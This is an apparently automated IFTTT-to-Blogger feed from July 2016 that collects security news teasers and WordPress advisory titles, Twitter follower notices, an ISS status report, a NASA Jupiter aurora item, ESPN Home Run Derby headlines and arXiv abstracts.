Millions of Xiaomi smartphones are vulnerable to a dangerous remote code execution (RCE) vulnerability that could grant attackers complete control of handsets. The vulnerability, now patched, exists in MIUI – Xiaomi's own implementation of the Android operating system – in versions prior to MIUI Global Stable 7.2 which is based on Android 6.0. The flaw, discovered by IBM X-Force researcher


from The Hacker News http://ift.tt/29UEydS
via IFTTT

Doesn't work in Chrome anonymous mode

Doesn't work in Chrome anonymous mode (1 post). acn. Member Posted 8 minutes ago #. Hi, thanks for this plugin! I stumbled across an issue with it ...

from Google Alert - anonymous http://ift.tt/29BvnL3
via IFTTT

[FD] Easy Forms for MailChimp Local File Inclusion vulnerability

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] WP Fastest Cache Member Local File Inclusion vulnerability

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting vulnerability in Profile Builder WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting vulnerability in Master Slider WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting vulnerability in Email Users WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

How to run Graphical Ubuntu Linux from Bash Shell in Windows 10

You might be aware of Microsoft and Canonical's partnership to integrate "Bash on Ubuntu on Windows 10," which is typically a non-graphical Ubuntu running over Windows Subsystem for Linux. Windows 10 doesn’t officially support graphical Linux desktop applications. But, now we have noticed a very interesting ticket titled "Run Any Desktop Environment in WSL" raised at Github repository, in


from The Hacker News http://ift.tt/29BSiIr
via IFTTT

Only authenticated user can create anotations and anonymous users can view the created anotations

Only authenticated user can create annotations and anonymous users can view the created annotations.

from Google Alert - anonymous http://ift.tt/29vf1mO
via IFTTT

I have a new follower on Twitter


Zip Code
Zip Code Wilmington is an employer-driven code school teaching the exact skills that #fortune500 employers need. #Java in 12 wks. Paid apprenticeships available
Wilmington, DE
http://t.co/nOPpLep0gZ
Following: 4566 - Followers: 5782

July 12, 2016 at 08:21AM via Twitter http://twitter.com/zipcodewilm

ISS Daily Summary Report – 07/11/16

47 Soyuz (47S) Docking: 47S successfully docked to the ISS at 11:06 PM CDT last Friday. The arrival of Expedition 48 crew members Anatoly Ivanishin, Takuya Onishi and Kate Rubins, the ISS will be in 6-crew operations until 46S return on September 6. Dose Distribution Inside the ISS – 3D (DOSIS 3D): Over the weekend, the crew installed passive radiation detectors in the Columbus module in support of European Space Agency’s (ESA’s) DOSIS 3D investigation.  Data from the various active and passive radiation detectors installed in the ISS are used in the determination of the radiation field parameters absorbed doses and dose equivalents inside the ISS.  A concise three dimensional (3D) dose distribution map of all the segments of the ISS will be developed based on this data as well as data from JAXA and NASA monitoring devices. Space Headaches: Over the weekend and today, the European Space Agency (ESA) Space Headaches questionnaire was completed to provide information to help in the development of methods to alleviate associated symptoms and improvement in the well-being and performance of crew members in space. Headaches during space flight can negatively affect mental and physical capacities of crew members which can influence performance during a space mission. Fine Motor Skills: A series of interactive tasks on a touchscreen tablet were completed over the weekend and today for the Fine Motor Skills investigation.  This investigation is critical during long-duration space missions, particularly for those skills needed to interact with technologies required in next-generation space vehicles, spacesuits, and habitats. Crew fine motor skills are also necessary for performing tasks in transit or on a planetary surface, such as information access, training, subsystem maintenance, and medical treatment. Marrow Blood, Breath, and Ambient Air Sample Collection: Today the crew took blood, breath, and ambient air samples for the Canadian Space Agency (CSA) Marrow experiment which investigates the effect of microgravity on human bone marrow. It is believed that microgravity, like long-duration bed rest on Earth, has a negative effect on bone marrow and the blood cells that are produced in the marrow. The extent of this effect and its recovery are of interest to space research and healthcare providers on Earth. Mouse Epigenetics Setup Operations: In preparation for the Mouse Epigenetics experiment which arrives on SpaceX-9, the crew set up the Mouse Habitat Cage Unit and installed the food cartridge, odor Filter, water fill-up, and the Cell Biology Experiment Facility (CBEF) filter caser. The Mouse Epigenetics investigation studies altered gene expression patterns in the organs of male mice that spend one month in space, and also examines changes in the DNA of their offspring. Results from the investigation identify genetic alterations that happen after exposure to the microgravity environment of space. EarthKAM Module Installation and Activation in Service Module (SM): The Russian crew set up the EarthKAM payload components in SM which begins a week-long imaging session. The objective of Sally Ride EarthKAM is to integrate Earth images with inquiry-based learning to enhance curricula in support of national and state education standards; to provide students and educators the opportunity to participate in a space mission and to develop teamwork, communication, and problem solving skills; to engage teams of students, educators, and researchers in collaborative investigations using remotely-sensed data; and to incorporate the active use of Web-based tools and resources in support of the learning process. Habitability Human Factors Directed Observations: The crew recorded and submitted a walk-through video documenting observations of an area or activity providing insight related to human factors and habitability. The Habitability investigation collects observations about the relationship between crew members and their environment on the ISS. Observations can help spacecraft designers understand how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need.  47S Crew On Board Training (OBT): The newly arrived crew reviewed and practiced emergency mask don and purge technique. They also performed emergency hardware familiarization to review locations of equipment and valve positions in the event of an emergency. During these training sessions the crew consulted and coordinated with specialists from all control centers. SSRMS Mobilt Transporter (MT) Translate:  Today, the MT was translated from worksite 4 to worksite 6 in preparation for SpaceX-9 arrival OBT and capture. Today’s Planned Activities All activities were completed unless otherwise noted. MARROW – air sampling Calf Volume Measurement / r/g 2748 CSA Blood Collection CSA Refrigerated Centrifuge Configuration Daily Planning Conference (S-band) CSA Refrigerated Centrifuge Close Out Ops CSA Sample Insertion into MELFI MOUSE Pre-experiment Mouse Habitat Cage Unit Setup On MCC Go Brine and urine transfer from EDV-U to Progress 432 [AO] Rodnik H2O Tank2 / r/g 2750 EarthKAM Experiment in SM.  Battery Charge Deactivation of Souyz 731 Gas Analyzer FINEMOTR Experiment Test Replacement of CO2 Filter Unit ИК0501 Soyuz 731 Transfers and IMS Ops / r/g 2734 CSA Blood Sample Collection Closeout Ops Crew time for ISS adaptation and orientation Study of veins in lower extremities / r/g 2749 FINEMOTR Experiment Test Double Cold Bag (DCB) trash the Double Coldbags  Study of veins in lower extremities / r/g 2749 Life On The Station Photo and Video / r/g 2747 Crew time for ISS adaptation and orientation LAB HD camera adjustment to view TREK laptop MARROW Breath And Ambient Air Sample Setup Crew time for ISS adaptation and orientation WRS Sample Collection CALCIUM. Experiment Session 2 / r/g 2746 Crew time for ISS adaptation TOCA Potable Water Dispenser (PWD) Sample Analysis Unlatching N2 Nadir Hatch MELFI HW Overview Health Maintenance System (HMS) Profile of Mood States (POMS) Questionnaire CSA Blood Collection Setup Deactivation of Soyuz 720 Gas Analyzer MRM1-FGB Screw Clamp Tightening Emergency Mask OBT Water Processing using MCD Air Heater Fan (БВН) Screen Cleaning in ТК 720 Maintenance activation of Atmosphere Purification System Emergency Vacuum Valves ISS Emergency Hardware Familiarization OBT Maintenance activation of Atmosphere Purification System Emergency Vacuum Valves  Auxiliary Laptop Anti-Virus Update / r/g 8247 СОЖ Maintenance EarthKAM Module Installation and Activation in SM ISS Crew Adaptation SSC 5 and 16 Config […]

from ISS On-Orbit Status Report http://ift.tt/2a5m72E
via IFTTT

I have a new follower on Twitter


InsightBrief
Short documents for busy professionals, summarising longer reports & events so that readers can swiftly become acquainted with a larger body of knowledge.
London
http://t.co/jHIq9FJSrD
Following: 13278 - Followers: 16740

July 12, 2016 at 07:35AM via Twitter http://twitter.com/InsightBrief

accessing anonymous json object

accessing anonymous json object. Hi im having a bit of trouble accessing a returned json object, mainly the top level one. Its name in the console ...

from Google Alert - anonymous http://ift.tt/29T4QgX
via IFTTT

Uh-Oh! Pokémon GO grants itself 'Full Access' to your Google Account — Fix It NOW

Nintendo's new location-based augmented reality game Pokémon GO has been making rounds since its launch just a few days ago. People are so excited to catch 'em all that brought Nintendo's market-value gains to $7.5 Billion (£5.8 Billion) in just two days – the highest surge since 1983. Due to the huge interest surrounding Pokémon GO, even hackers are using the game's popularity to distribute


from The Hacker News http://ift.tt/29FiSRp
via IFTTT

Re: [giampaolo/psutil] Extend open_files (#859)

The anonymous files are open files that don't have a corresponding inodes (i.e. they do not have a path on the filesystem). Examples of these would be created using epoll_create, inotify_init, signalfd, eventfd, and others. Nevertheless, there is still very useful data that is contained in their respective /proc/$pid/fdinfo entries. For instance, if a process had numerous fd's being monitored by an epoll fd, you can then see which events were masked into said poll. Another use (and the one that I had been needing) would be if you have an inotify fd in a process and needed to see what the inode of contained watch is, you would be able to find this under the inotifys ino field. The mnt_id has been exposed since Linux 3.15. Which needed when a there are two file descriptors with the same path but, are on different mount points with separate namespaces. —You are receiving this because you are subscribed to this thread.Reply to this email directly, view it on GitHub, or mute the thread.

Source: Gmail -> IFTTT-> Blogger

Lambda (anonymous/first class procedures) and custom reporters

Ok, I'll try to make a definitive explanation here. So when we say this, ((2) + (2)) we are asking Scratch what 2 + 2 is. Scratch will give you the answer, ...

from Google Alert - anonymous http://ift.tt/29AT1IF
via IFTTT

I have a new follower on Twitter


Steph Nissen
Social Media Marketer for Small Biz and Startups, CEO @Nissen_Media, @AgoraPulse Writer, Proud #Mompreneur and #SproutAllStar!
St Louis, MO
https://t.co/P5O7yHnzmq
Following: 15389 - Followers: 20346

July 12, 2016 at 02:04AM via Twitter http://twitter.com/stephnissen_

Aurorae on Jupiter


Jupiter has aurorae. Like Earth, the magnetic field of the gas giant funnels charged particles released from the Sun onto the poles. As these particles strike the atmosphere, electrons are temporarily knocked away from existing gas molecules. Electric force attracts these electrons back. As the electrons recombine to remake neutral molecules, auroral light is emitted. In the featured recently released composite image by the Hubble Space Telescope taken in ultraviolet light, the aurorae appear as annular sheets around the pole. Unlike Earth's aurorae, Jupiter's aurorae include several bright streaks and dots. Jupiter's Great Red Spot is visible on the lower right. Recent aurorae on Jupiter have been particularly strong -- a fortunate coincide with the arrival of NASA's Juno spacecraft at Jupiter last week. Juno was able to monitor the Solar Wind as it approached Jupiter, enabling a better understanding of aurorae in general, including on Earth. via NASA http://ift.tt/29xWBlv

Monday, July 11, 2016

Home Run Derby: Mark Trumbo (13 HR) eliminated by Marlins' Giancarlo Stanton (17 HR) in the semifinals (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


Clarissa Wilson
I'm Clarissa Wilson, a money relationship coach, helping women develop their relationship with their money for financial freedom.
PA, USA
http://t.co/7DhftF1moK
Following: 2773 - Followers: 3108

July 11, 2016 at 09:50PM via Twitter http://twitter.com/clarissaawilson

Home Run Derby: Giancarlo Stanton vs. Mark Trumbo, Todd Frazier vs. Adam Duvall in semifinals; watch live in ESPN App (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Coach K explains his anonymous social media accounts

Duke coach Mike Krzyzewski made headlines about a year ago when he revealed that he uses anonymous accounts on Twitter and Instagram.

from Google Alert - anonymous http://ift.tt/29DeLGp
via IFTTT

Home Run Derby Video: Mark Trumbo uncorks mammoth blasts into the upper decks in 1st-round victory over Corey Seager (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Analysis of opinionated text for opinion mining. (arXiv:1607.02576v1 [cs.CL])

In sentiment analysis, the polarities of the opinions expressed on an object/feature are determined to assess the sentiment of a sentence or document whether it is positive/negative/neutral. Naturally, the object/feature is a noun representation which refers to a product or a component of a product, let us say, the "lens" in a camera and opinions emanating on it are captured in adjectives, verbs, adverbs and noun words themselves. Apart from such words, other meta-information and diverse effective features are also going to play an important role in influencing the sentiment polarity and contribute significantly to the performance of the system. In this paper, some of the associated information/meta-data are explored and investigated in the sentiment text. Based on the analysis results presented here, there is scope for further assessment and utilization of the meta-information as features in text categorization, ranking text document, identification of spam documents and polarity classification problems.



from cs.AI updates on arXiv.org http://ift.tt/29JF3Ii
via IFTTT

Augmenting Supervised Emotion Recognition with Rule-Based Decision Model. (arXiv:1607.02660v1 [cs.HC])

The aim of this research is development of rule based decision model for emotion recognition. This research also proposes using the rules for augmenting inter-corporal recognition accuracy in multimodal systems that use supervised learning techniques. The classifiers for such learning based recognition systems are susceptible to over fitting and only perform well on intra-corporal data. To overcome the limitation this research proposes using rule based model as an additional modality. The rules were developed using raw feature data from visual channel, based on human annotator agreement and existing studies that have attributed movement and postures to emotions. The outcome of the rule evaluations was combined during the decision phase of emotion recognition system. The results indicate rule based emotion recognition augment recognition accuracy of learning based systems and also provide better recognition rate across inter corpus emotion test data.



from cs.AI updates on arXiv.org http://ift.tt/29L82Zh
via IFTTT

Extending Weakly-Sticky Datalog+/-: Query-Answering Tractability and Optimizations. (arXiv:1607.02682v1 [cs.DB])

Weakly-sticky (WS) Datalog+/- is an expressive member of the family of Datalog+/- programs that is based on the syntactic notions of stickiness and weak-acyclicity. Query answering over the WS programs has been investigated, but there is still much work to do on the design and implementation of practical query answering (QA) algorithms and their optimizations. Here, we study sticky and WS programs from the point of view of the behavior of the chase procedure, extending the stickiness property of the chase to that of generalized stickiness of the chase (gsch-property). With this property we specify the semantic class of GSCh programs, which includes sticky and WS programs, and other syntactic subclasses that we identify. In particular, we introduce joint-weakly-sticky (JWS) programs, that include WS programs. We also propose a bottom-up QA algorithm for a range of subclasses of GSCh. The algorithm runs in polynomial time (in data) for JWS programs. Unlike the WS class, JWS is closed under a general magic-sets rewriting procedure for the optimization of programs with existential rules. We apply the magic-sets rewriting in combination with the proposed QA algorithm for the optimization of QA over JWS programs.



from cs.AI updates on arXiv.org http://ift.tt/29JEOwP
via IFTTT